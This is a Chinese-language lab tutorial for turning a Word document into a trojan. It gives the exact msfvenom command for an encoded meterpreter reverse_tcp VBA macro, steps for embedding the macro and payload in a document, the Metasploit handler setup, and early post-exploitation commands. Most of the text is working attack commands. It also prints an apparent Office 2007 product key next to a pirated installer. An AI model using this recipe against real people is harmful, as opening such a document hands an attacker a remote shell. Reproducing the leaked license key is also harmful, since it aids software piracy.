目录
Metasploitable2-linux:靶机 192.168.234.8
kali-debian:攻击机 192.168.234.141
win7 虚拟机:靶机 192.168.234.158
在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
利用宏感染 word 文档获取 shell
总结:
(1)win7安装office2007
(2)msfvenom生成木马 --宏代码和payload
(3)office新建文档(内容都可),文档中建宏(生成的木马宏代码复制进去)并将payload(生成的木马payload)复制进文档
(4)MSF 配置侦听
————利用exploit/multi/handler模块,设置payload为windows/meterpreter/reverse_tcp,攻击建立session会话
(1)win7安装office2007
将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后, 安装 office。
office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8
(2)msfvenom生成木马 --宏代码和payload
root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
——msfvenom生成木马,执行完成后会生成 2 段代码
第一段代码是 MACRO CODE [ˈmækrəʊ kəʊd] 宏代码
第二段代码 payload,从PAYLOAD DATA开始一直最后。
(3)office新建文档并配置宏和payloads
复制宏代码,打开msoffice word新建宏
复制第一段 code 代码内容到编辑器中,保存后关闭宏编辑器窗口即可。
复制第二段代码 payload 到 word 正文,然后另存为文档。
另存为
(4)MSF 配置侦听,生成session
msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.234.141
msf6 exploit(multi/handler) > jobs -K
msf6 exploit(multi/handler) > exploit
配置好侦听之后我们打开我们制作的 word 文档,文档一旦打开就会执行 payload 连接到 MSF,关闭 word 文档之后 session 不受影响
允许运行宏:
打开之后回到 MSF 控制台,会发现Session 已经建立,但是我的电脑报错(路径/文件访问错误—宏代码的问题,所以我就不做修改了,如果代码路径等正确,msf会出现会话
meterpreter > getuid
Server username: WIN- \zj
我们尝试把 payload 转移到其他进程
meterpreter > getpid ——获取当前进程 pid
Current pid: 212
meterpreter > ps ———查看进程列表,在 ps 列出的进程列表,倒数第 3 个就是我们进程的 pid